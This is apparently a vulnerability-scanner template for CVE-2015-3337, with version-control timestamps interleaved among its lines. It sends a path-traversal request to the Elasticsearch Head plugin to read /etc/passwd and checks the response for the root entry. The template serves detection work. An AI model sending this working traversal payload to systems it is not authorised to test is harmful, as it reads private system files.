2021-03-24 20:51:43 +00:00
id : CVE-2015-3337
info :
2021-08-19 14:44:46 +00:00
name : Elasticsearch Head plugin LFI
author : pdteam
severity : high
description : Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
reference : https://www.exploit-db.com/exploits/37054/
tags : cve,cve2015,elastic,lfi
2021-03-24 20:51:43 +00:00
requests :
2021-08-19 14:44:46 +00:00
- method : GET
path :
- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
2021-03-24 20:51:43 +00:00
2021-08-19 14:44:46 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0"
part : body
2021-03-24 20:51:43 +00:00
2021-08-19 14:44:46 +00:00
- type : status
status :
- 200